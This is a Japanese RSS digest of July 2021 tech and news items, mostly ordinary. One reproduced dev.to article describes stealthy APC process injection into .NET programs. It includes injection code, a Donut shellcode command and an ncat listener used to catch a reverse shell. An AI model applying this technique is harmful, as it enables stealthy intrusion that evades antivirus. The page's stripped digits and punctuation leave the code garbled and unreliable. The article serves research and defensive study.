投稿時間:2021-07-26 01:22:52 RSSフィード2021-07-26 01:00 分まとめ(26件)

カテゴリー等 サイト名等 記事タイトル・トレンドワード等 リンクURL 頻出ワード・要約等/検索ボリューム 登録日
python Pythonタグが付けられた新着投稿 - Qiita AtCoder Regular Contest 124 解説 https://qiita.com/DaikiSuyama/items/3327f4fccb387f02dc8f この時、複数の条件が被っているマスは、どの数をそのマスに選んでもいずれかの条件を満たさないので通りです。 2021-07-26 00:46:20
python Pythonタグが付けられた新着投稿 - Qiita 【Python】進化する関数 https://qiita.com/Cartelet/items/6cffd1cf8ac300f0ab76 実行結果は関数名のローカル変数に保存されます。 2021-07-26 00:12:28
Program [全てのタグ]の新着質問一覧|teratail(テラテイル) C 文字化けについて https://teratail.com/questions/351203?rss=all C文字化けについて前提・実現したいこと「あ、い、う」のつの中から一つ取り出してコンソール画面に出力したい。 2021-07-26 00:36:29
Program [全てのタグ]の新着質問一覧|teratail(テラテイル) Windowsサーバ(IIS)でDjangoアプリを公開しようとした際に wfastcgi を有効化するところでエラーになります https://teratail.com/questions/351202?rss=all WindowsサーバIISでDjangoアプリを公開しようとした際にwfastcgiを有効化するところでエラーになります前提・実現したいことIISを使ってDjangoのアプリケーションを公開しようとしています。 2021-07-26 00:09:54
Program [全てのタグ]の新着質問一覧|teratail(テラテイル) RandomNumberGeneratorの初期化 https://teratail.com/questions/351201?rss=all newrandomnumbergenerator 2021-07-26 00:04:11
Program [全てのタグ]の新着質問一覧|teratail(テラテイル) ラジオボタンの切り替えとリンクの連動 https://teratail.com/questions/351200?rss=all ラジオボタンの切り替えとリンクの連動前提・実現したいことphpcssで実装したラジオボタンを切り替え、アンカーリンクと連動させたいです。 2021-07-26 00:02:54
Program [全てのタグ]の新着質問一覧|teratail(テラテイル) VPCをまたいだLB(ALB)を行う際のVPC間接続について https://teratail.com/questions/351199?rss=all VPCをまたいだLBALBを行う際のVPC間接続について表題の件につきまして、VPCAにデプロイしたALBからVPCBとVPCCへHTTPHTTPS通信を振り分けたいと思っています。 2021-07-26 00:00:28
Ruby Rubyタグが付けられた新着投稿 - Qiita ディスク空き容量を取得するFluentdのプラグイン作った https://qiita.com/nomunomu0504/items/ab8d3098f5fffd380202 executecommanddfPkfluentdetcgtdevnullこのコマンドを実行すると以下のような結果が返ってきます。 2021-07-26 00:52:02
AWS AWSタグが付けられた新着投稿 - Qiita DenoでDynamoDbを操作する https://qiita.com/yamachita0109/items/af3073eb003c52c6e0db DenoでDynamoDbを操作する少しハマったので備忘録として。 2021-07-26 00:21:56
golang Goタグが付けられた新着投稿 - Qiita AtCoder Regular Contest 124 解説 https://qiita.com/DaikiSuyama/items/3327f4fccb387f02dc8f この時、複数の条件が被っているマスは、どの数をそのマスに選んでもいずれかの条件を満たさないので通りです。 2021-07-26 00:46:20
海外TECH DEV Community TIPS & TRICKS OF JAVASCRIPT & REACT https://dev.to/coderzx/tips-tricks-of-javascript-react-49am TIPS amp TRICKS OF JAVASCRIPT amp REACTTIPS Easiest way of string to integer conversion const value const value function add field field return field field add value value TIPS Easiest way of float to integer conversion const floatToInt TIPS Use Global object always should not need localStorageNote if data is is static then you should use it and don t use any kind secret or confidential data here const user first name Rowan last name Atkinson window user userTIPS Don t use if not necessary ternary const DemoComponent gt const show setShow useState false return lt div gt show amp lt Message amp gt lt div gt Right way with amp amp const DemoComponent gt const show setShow useState false return lt div gt show amp amp lt Message gt lt div gt TIPS Don t do itif variable null variable undefined variable let variable variable Do this short and simpleconst variable variable new TIPS Don t do itMath floor trueDo this short and simple trueTIPS Don t do itswitch something case doSomething break case doSomethingElse break case doSomethingElseAndOver break And so on Do this short and simpleconst cases doSomething doSomethingElse doSomethingElseAndOver Note This one has performance issue I prefer use this one when you have crying need Switch statement is more faster than this solutionTIPS Don t do itif x x x console log X has some value Do this short and simple indexOf x amp amp console log X has some value TIPS Don t do itconst param const param const param const param function MyFunc param param param param gt console log param param param param MyFunc param param param param Do this short and simpleconst params param param param param function MyFunc param param param param gt console log param param param param MyFunc params TIPS Don t do itfunction Myfunc value if value console log you have a value else throw new Error You don t have a value Do this short and simpleNOTE If you check error first then it s don t go else block but if you do first one it will check first value is exist then if not found it will go the else block function Myfunc value return value throw new Error You don t have a value console log you have a value 2021-07-25 15:29:51
海外TECH DEV Community 4 JavaScript Projects That Will Get You Hired https://dev.to/coderzx/4-javascript-projects-that-will-get-you-hired-44o5 JavaScript Projects That Will Get You HiredIf you re starting to apply for your first web developer junior position then you might want to consider building out one of the if not all projects Why The projects were thought out based on daily tasks that many web developers including seniors face every day Consume API Backend When you consume someone else s API you are talking to a third party outside of your system You could choose what type of data you want to get should you validate it how do you want to store it in your database etc This is where you could throw in your imagination and do whatever you want with the data You could also perform a small CRUD system once you ve retrieved the data To give you an idea you could consume Yelp or SpaceX API but there is a lot more out there gt gt Nodejs Project For Beginners Hour Challenge Frontend This is my personal favorite if you re planning to be a front end developer Within hours you should build a single page application using a framework that you ve never used before It has to be responsive look good decent and deployed onto a hosting service Having something like on the resume will impress every person on the interview as you will demonstrate how fast you can learn implement and not get destructed in the process But again the key is to finish it in hours Building Blog Post Frontend Backend You ve probably heard this already but there is one key element that many developers don t implement When we build projects with X number of records on a single page we follow a specific process that allows us to load a specific number of records instead of loading all records at once This process is called pagination Have you seen something like this at the bottom of any e commerce website Well that is pagination So when you are building out a blog page you re focusing on implementation the pagination functionality Suppose you don t have a blog no problem You could talk to Yelp API or the database that you ve built for the first project Hotel System Frontend Backend This one will be a bit more complex and time consuming as you will be building out the frontend backend database and most importantly building out the features Every hotel has a specific number of available rooms included in the packages this is up to your imagination for how long the guest will be staying and a lot more Don t go overboard and build out the Hilton system but focus on maybe to features that you know could be fun to demonstrate during the interview and do small calculations These are the four projects that could help you stand out during the interview and help you to land a job much faster than you think You may not even get a coding challenge because you will demonstrate excellent work that s what happened to me 2021-07-25 15:16:49
海外TECH DEV Community Why i hate Javascript https://dev.to/alichraghi/why-i-hate-javascript-22pb Why i hate JavascriptJavaScript has been one of the most popular programming languages for many years it is deferentially the most widely used language But it is nonsense These are the reasons why I stay away from JavaScript there s no Static Typeyes there s no static type and most people think this is good because you can always change a variable type but no that s bad for some reasons decrease Run time speeddecrease Initialization speedprogramming mistakesunknown data size and then memory leaksim not really say dynamic type is always bad but this is not understandable why javascript have t static typing illogical comparisonsthis one is more famous in JS not enough checkout the examples below → true → false this website explains → truetypeof NaN number → trueNaN NaN → true global variable by defaulthmm how and why this happen idkfunction my func x my func console log x → i know you can solve it with var or let most languages is very sensitive to global variables even you can t have global variable in rust you can use static mut but you need to always use it as a unsafe variable because global variables can be altered by any part of the code that make difficult to remember or reason about every possible use also they can t be limited to some parts of the code sort function sort function is a method for arrays but idk why it does t like numeric arrays see the below example sort → i have explained my reasons but not sure you agree or not if no explain in comments 2021-07-25 15:13:02
海外TECH DEV Community Stealthy Code Injection in a Running .NET Process https://dev.to/wireless90/stealthy-code-injection-in-a-running-net-process-i5c Stealthy Code Injection in a Running NET Process Stealthy Code Injection in a Running NET Process PrologueFor the past few months I gained interest in understanding more on the Portable Executable PE format and Process Injection Among the many Process Injection techniques available I was intrigued by APC INJECTION Asynchronous Process Calls APC Malware can take advantage of Asynchronous Procedure Calls APC to force another thread to execute their custom code by attaching it to the APC Queue of the target thread Each thread has a queue of APCs which are waiting for execution upon the target thread entering alertable state A thread enters an alertable state if it calls SleepEx SignalObjectAndWait MsgWaitForMultipleObjectsEx WaitForMultipleObjectsEx or WaitForSingleObjectEx functions The malware usually looks for any thread that is in an alertable state and then calls OpenThread and QueueUserAPC to queue an APC to a thread The above taken from Ashkan Hosseini s writeup see credits below gives a very good overview of APCs and how malwares could possible use them for Process Injection Basically Every thread has a queue You can put a function in this queue This queue executes asynchronously meaning when the thread is free and in an alertable state the function in this queue gets ran FIFOFor a thread to be in an alertable state the thread needs to execute one of the following functionsSleepEx SignalObjectAndWaitWaitForSingleObjectExWaitForMultipleObjectsExMsgWaitForMultipleObjectsExNtTestAlert Undocumented function credits to ired team So where are we going with this The core of this injection technique is the function QueueUserAPC QueueUserApc adds the shellcode as an asynchronous function which will be called when the thread becomes alertable One might think that an Antivirus or an EDR could simply hook into this function and flag whoever uses it However this is a frequently used function for Asynchronous Programming So the security solutions might monitor a chain of call from QueueUserApc into ResumeThread or some other functions like CreateThread CreateRemoteThread API calls which are more popular and hence usually more scrutinized by AV EDR vendors What if there exists a way in the realm of Net Applications where the thread is set to alertable always not by us but by the Common Language Runtime CLR CLR is Our FriendWhen we compile a Net code it is compiled into Microsoft Intermediate Language MSIL code This is in the format of a exe or a dll However these PE files do not contain the machine instructions A common term for them is Managed Code They are machine independant As long as you have the right Net Framework installed you are good to go The CLR Loader loads this Managed Code and sends the instructions into the Just in time compiler which converts the MSIL code at runtime to machine code which is executed by the CPU Interestingly enough The image above shows that the CLR ultimately handles the threading support as well Threads in NET are handled by the CLR for you and it might call one of the alertable methods listed above A statement in C such as Thread Sleep will eventually be compiled by the JIT and call one of the alertable methods SleepEX The thread is now lying dormant sleeping Unless its APC queue has some function that it needs to execute The interesting part is we don t even need our target executable to be calling Thread Sleep This amazing article and research by Dwight Hohnstein shows thatDue to the nature of the NET compiled language runtime user asynchronous procedure calls APCs are processed upon the exit of any NET assembly without manually triggering an alertable state from managed code It shows that the CLR always calls WaitForMultipleObjectsEx when ever the program exits What this means for us This means that ALL NET executables even if they do not have any alertable calls are loaded by the CLR and upon exit of the Net executable the CLR will call an alertable method This means we can easily inject our shellcode in the form of MSIL code into net executables without overly using the suspicious chain of API calls and eventually when the target program exits the thread would be set to an alertable state as the CLR calls WaitForMultipleObjectsEx and our shellcode executes This inspired me to write a POC to see for myself if it really works I am going to omit some code in these examples so as to make it shorter The full source code is in the repository Let s first create our ShellCodeThe shellcode is going to be a simple reverse shell written in C Its a reverse shell that connects to port Code can be found here I then used Donut to compile our MSIL binary into a shellcode D Users Razali Source Repos donut gt donut exe a f cShellCode Program mMain o myshellcode txt D Users Razali Source Repos ProcessInjector NET ProcessInjector ShellCode bin Release shellcode exe Donut shellcode generator v Copyright c TheWover Odzhan Instance type Embedded Module file D Users Razali Source Repos ProcessInjector NET ProcessInjector ShellCode bin Release shellcode exe Entropy Random names Encryption File type NET EXE Target CPU amd AMSI WDLP continue Shellcode myshellcode txt a specifies to compile the shellcode to amd f specifies to encode it to base c specifies the lt namespace gt lt class name gt m specifies the Method name o specifies the output filename Lets next set up our listenerI will be using netcat for all examples below to listen for a connection and interact with the shell C Users Razali Desktop ncat portable BETA gt ncat l Self InjectionThis example demonstrates that after injecting the shellcode within the calling process when the process exits the shellcode gets called At no part of the code did we put any alertable calls static void SelfInject byte shellcode IntPtr allocatedSpacePtr VirtualAlloc shellcode Length x x Marshal Copy shellcode allocatedSpacePtr shellcode Length QueueUserAPC allocatedSpacePtr GetCurrentThread Console WriteLine Goodbye Henceforth it confirms that when a NET process exits the CLR did call an alertable method on behalf of me which invokes the shellcode and we get a shell Injection using Race ConditionAs stated in the documentattion of QueueUserAPC if we queue an APC before the main thread starts the main thread would first prioritize running all the APC s in the queue before running the main code While experimenting I found that a Console Application is sometimes too quick to perform a race condition on as the CLR seems to load and start the main thread even before I finish writing my APC into the queue Thus I tried injecting the APC into a Windows Form which takes a longer time for the UI Thread to be set up by the CLR allowing me to quickly inject my APC before it begins What we expect to observe is to achieve a shell without even exiting the NET process as the shell is achieved even before the UI Thread main thread starts Since the shell is being run by the UI Thread we won t see the Windows Form as the UI Thread is busy with my shell static void InjectRunningProcessUsingRaceCondition byte shellcode string victimProcessPath STARTUPINFO startupinfo new STARTUPINFO PROCESS INFORMATION processInformation new PROCESS INFORMATION CreateProcess null victimProcessPath false null ref startupinfo ref processInformation IntPtr allocatedSpacePtr VirtualAllocEx processInformation hProcess IntPtr Zero shellcode Length x x IntPtr bytesWritten IntPtr Zero WriteProcessMemory processInformation hProcess allocatedSpacePtr shellcode shellcode Length out bytesWritten Process process Process GetProcessById processInformation dwProcessId foreach ProcessThread thread in process Threads IntPtr threadHandle OpenThread x false thread Id VirtualProtectEx processInformation hProcess allocatedSpacePtr shellcode Length x out QueueUserAPC allocatedSpacePtr threadHandle Henceforth it confirms that it is possible to race against the Main thread and inject our APC before it starts which results in the Main thread executing our APC before the actual code Injecting into any Running NET ProcessAs confirmed in our first example our APC would get executed after the program exits I simulated it by simply letting my Windows Form boot up first giving it a headstart by pausing using Thread Sleep in my injector code after which I perform the injection static void InjectRunningProcess byte shellcode string victimProcessPath STARTUPINFO startupinfo new STARTUPINFO PROCESS INFORMATION processInformation new PROCESS INFORMATION CreateProcess null victimProcessPath false null ref startupinfo ref processInformation Thread sleep is used here to give the victim process time to load and run its main thread We do not want to race against it Thread Sleep IntPtr allocatedSpacePtr VirtualAllocEx processInformation hProcess IntPtr Zero shellcode Length x x IntPtr bytesWritten IntPtr Zero WriteProcessMemory processInformation hProcess allocatedSpacePtr shellcode shellcode Length out bytesWritten Process process Process GetProcessById processInformation dwProcessId foreach ProcessThread thread in process Threads IntPtr threadHandle OpenThread x false thread Id VirtualProtectEx processInformation hProcess allocatedSpacePtr shellcode Length x out QueueUserAPC allocatedSpacePtr threadHandle As expected the moment I close the application we gain a reverse shell The above image shows that the Form starts after which the injection of the APC occurs No connection happens as expected After exiting the form we gain a reverse shell ConclusionWe saw that the CLR would always make the main thread alertable which we can leverage on using the QueueUserAPC injection method Although we could call the alertable method ourselves allowing the CLR to call it for us makes it more stealthy We also saw that this could be exploited for any NET executables As Dwight Hohnstein concluded in his blogpost one can then leverage on hooking into the task schedular events and injecting into one of the scheduled programs This would allow our code to be ran in a signed binary or be ran with leveraged permissions CreditsTen process injection techniques A technical survey of common and trending process injection techniques byAshkan HosseiniThe Curious Case of QueueUserAPC by Dwight HohnsteinShellcode Execution in a Local Process with QueueUserAPC and NtTestAlertDonut PIC Code generator for NET 2021-07-25 15:01:04
Apple AppleInsider - Frontpage News Face ID could reach Mac lineup within a 'couple of years' https://appleinsider.com/articles/21/07/25/face-id-could-reach-mac-lineup-within-a-couple-of-years?utm_medium=rss Face ID could reach Mac lineup within a x couple of years x Apple could be bringing Face ID over from iPhone to Mac within a few years according to a report with the added possibility of using cameras embedded in the display itself In terms of security the Mac and MacBook lineup still largely depend on passwords and in some cases Touch ID While iPhones and iPads currently benefit from using Face ID as a biometric security mechanism it is proposed that it could make its way to the Mac product lines in the future According to Mark Gurman s latest Power On newsletter for Bloomberg the change to Face ID is anticipated to happen within a couple of years The move will apparently be part of a general shift of all applicable products over to Face ID Read more 2021-07-25 15:01:54
Apple AppleInsider - Frontpage News Rogers quietly adds support for Apple Business Chat https://appleinsider.com/articles/21/07/25/rogers-quietly-adds-support-for-apple-business-chat?utm_medium=rss Rogers quietly adds support for Apple Business ChatRogers has become the latest major organization to include support for Apple Business Chat enabling customers of the Canadian carrier to chat with representatives using iMessage Apple Business Chat is a feature that launched in with the aim of streamlining customer service queries by using iMessage Using the feature customers can ask questions make bookings and even pay for services all within the same app While not publicly announced by the carrier it seems that Apple Business Chat has quietly been added to Rogers support offerings First reported by iPhoneinCanada texts to Rogers toll free number brings up an option to Message Us Now and to Get fast easy support from our team Read more 2021-07-25 15:02:16
Apple AppleInsider - Frontpage News Apple TV+ 'Central Park' cast and producers appear in Comic-Con panel https://appleinsider.com/articles/21/07/24/apple-tv-central-park-cast-and-producers-appear-in-comic-con-panel?utm_medium=rss Apple TV x Central Park x cast and producers appear in Comic Con panelProducers and stars of the Apple TV animated series Central Park have spoken at the virtual edition of the annual Comic Con event to talk about how the show was created Streamed and uploaded to YouTube as part of the Comic Con Home initiative the virtual panel consisted of six people including both producers and voices behind the hit show Central Park co creator and executive producer Loren Bouchard was joined by fellow co creator executive producer and voice of Birdie Josh Gad They were accompanied on the digital stage by Leslie Odom Jr who plays Owen Tillerman Tituss Burgess who voices Cole Tillerman and producers Kelvin Yu and Steven Davis Read more 2021-07-25 15:02:26
Apple AppleInsider - Frontpage News WhatsApp CEO takes issue with NSO's denials of iPhone Pegasus hacks https://appleinsider.com/articles/21/07/24/whatsapp-ceo-refutes-nsos-denials-on-iphone-pegasus-hacks?utm_medium=rss WhatsApp CEO takes issue with NSO x s denials of iPhone Pegasus hacksWhatsApp chief Will Cathcart has problems with the NSO Group taking no responsibility for surveillance and hacking of journalist and activist iPhones and other devices Following the discovery that the Pegasus spyware by NSO Group was being used to surveil high level journalists campaigners and world leaders NSO took steps to quieten the story On July NSO CEO Shalev Hulio claimed it couldn t control what governments ultimately did with its tools which were allegedly intended to catch serious criminals and terrorists However speaking to the Guardian WhatsApp head Will Cathcart suggested the leaked list of more than phone numbers believed to be people of interest of NSO clients may be genuine Cathcart also believes it matches up to WhatsApp s own investigation in seemingly proving it has been going on for a number of years Read more 2021-07-25 15:02:43
Apple AppleInsider - Frontpage News Deutsche Telekom's incubator seeks iOS AR app developers https://appleinsider.com/articles/21/07/24/deutsche-telekoms-incubator-seeks-ios-ar-app-developers?utm_medium=rss Deutsche Telekom x s incubator seeks iOS AR app developersDeutsche Telekom s tech incubator Hubraum is opening itself up to iOS developers working on augmented reality applications a program that includes development support from Apple Promoted by Oscar Falmer previously an AR evangelist for Apple the Hubraum iOS Innovation Program calls out for iOS developers to pitch their AR apps that can be boosted by Deutsche Telekom s technologies including G and Low Latency Edge Computing as well as early access to consumers Hubraum is looking for experienced iOS developers who feel they may benefit from access to the incubator and development support directly from Apple The project is also especially interested in iOS apps for mass market consumers Read more 2021-07-25 15:03:04
Apple AppleInsider - Frontpage News Did Apple leak the M1 16-inch MacBook Pro? -- This Week in Apple https://appleinsider.com/articles/21/07/24/did-apple-leak-the-m1-16-inch-macbook-pro----this-week-in-apple?utm_medium=rss Did Apple leak the M inch MacBook Pro This Week in AppleFor the latest This Week in Apple we examine Apple s supposed mistaken leak of the M inch MacBook Pro the release of iOS rumors around the iPhone and more Stay up to date on the last seven days of AppleEach week AppleInsider posts tons of stories about Apple its products rumors and information about related vendors and other firms Our weekend video series This Week in Apple condenses down the week s stories into an easy to digest video recap Read more 2021-07-25 15:03:17
海外TECH Engadget Las Vegas police solve an old murder case using record-low volume of DNA https://www.engadget.com/las-vegas-cold-murder-case-solved-with-dna-153714181.html?src=rss Las Vegas police solve an old murder case using record low volume of DNALas Vegas police appear to have smashed a record while using ancestry to find cold case suspects BBC Newsreports that Vegas law enforcement claims to have solved the murder of year old Stephanie Isaacson pictured here using the smallest known volume of DNA Investigators sent just nanograms of DNA samples or about cells to Othram s gene sequencing lab to help find a match For context a typical home DNA testing kit collects at least nanograms Othram used the sequences to comb through ancestry databases and pinpoint the suspect s cousin and identify Darren Roy Marchand as the culprit The team confirmed the match by comparing the sample against Marchand s DNA from an arrest for a murder case Marchand was never convicted and died in Vegas police launched the investigation after resident Justin Woo donated money to help law enforcement solve cases using quot minimal quot DNA levels The investigation at Othram started on January th but it wasn t until July th that the company identified a suspect Othram chief David Mittlemen characterized the effort as a quot huge milestone quot in a discussion with the BBC This could theoretically solve cold cases where the samples were previously thought too small to be usable The breakthrough won t necessarily thrill everyone however There have been concerns that law enforcement might violate privacy when conducting these tests and the Justice Department has established guidelines precisely to prevent those kinds of abuses While there s no indication Vegas authorities crossed boundaries in the Richardson case a much larger range of potentially solvable cases also widens the potential for more privacy violations 2021-07-25 15:37:14
海外TECH CodeProject Latest Articles Corona SEIR Workbench https://www.codeproject.com/Articles/5287156/Corona-SEIR-Workbench Corona SEIR WorkbenchPandemic SEIR and SEIRV modelling software and infrastructure for the Corona SARS COV COVID disease with data from Johns Hopkins University CSSE Robert Koch Institute and vaccination data from Our World In Data 2021-07-25 15:24:00
ニュース BBC News - Home Hugo Millan: Spaniard, 14, dies after crash at MotorLand Aragon https://www.bbc.co.uk/sport/motorsport/57961530 spain 2021-07-25 15:43:46
ニュース BBC News - Home Tokyo Olympics: Liberato Cacace, Teboho Mokoena and Teji Savanier in best goals on day two https://www.bbc.co.uk/sport/av/olympics/57961073 Tokyo Olympics Liberato Cacace Teboho Mokoena and Teji Savanier in best goals on day twoWatch the best goals from day two of the men s football competition featuring stunning strikes from Liberato Cacace Teboho Mokoena and Teji Savanier 2021-07-25 15:15:32
ニュース BBC News - Home Tokyo Olympics: Day-by-day guide to the key events, big stars and British medal hopes https://www.bbc.co.uk/sport/olympics/57778808 japan 2021-07-25 15:03:59
海外TECH reddit Did anyone was approached by someone like this? https://www.reddit.com/r/japanlife/comments/orddkn/did_anyone_was_approached_by_someone_like_this/ Did anyone was approached by someone like this I have a question for foreign students workers living in Japan I am a student in Japan i have been living here for awhile A month ago or so a women approached me out of nowhere in the building i study she was very friendly and asked me some general questions like where are you from etc A few weeks later she approached one of my friends more weirdly she just went to him and ask his number and where he was from and asked him meet at a place for free food right after they talked My friend said she spoke to him like i was friends with her and asked him if he knew me by the way I only saw her twice and talked to her like min total He told her he does not know who i was and he didnt go to the place made an excuse but she kept asking every week even though he said he doesnt want to go A few weeks later i saw her in the entrance of the building and she directly asked for my contact info I had a weird feeling i didnt know what to do i didnt want to be rude so i only gave my email That day she send an email to me saying i should tell my friend one she approached to check his messages In normal circumstances she should not even know that we are friends because there is no way she seen us together nor should know where we study and she send me that in spite of my friend telling her he doesnt know who i was One day after she asked if i want to go to a place the same place she wants my friend to come She send a link of a parking lot very far away from where i study to get free food i did not go and did not reply but despite that she send me another message saying my friend and her will go to that place and if i want i can join even though my friend said he will not go A few days after that she asked my friend again and this time told him to bring me with him for free food to the place she sent link to Then my friend offer to meet somewhere else like a eleven or somewhere public and she said no in a rude way and few hours later asked him to change some settings in Line out of nowhere I dont know if she is just trying to help or there is something weird going on I want to know if anyone had an experience like this or heard something like this is this normal submitted by u dogfromsaturn to r japanlife link comments 2021-07-25 15:15:48

コメント

このブログの人気の投稿

投稿時間:2021-06-17 05:05:34 RSSフィード2021-06-17 05:00 分まとめ(1274件)

投稿時間:2021-06-20 02:06:12 RSSフィード2021-06-20 02:00 分まとめ(3871件)

投稿時間:2020-12-01 09:41:49 RSSフィード2020-12-01 09:00 分まとめ(69件)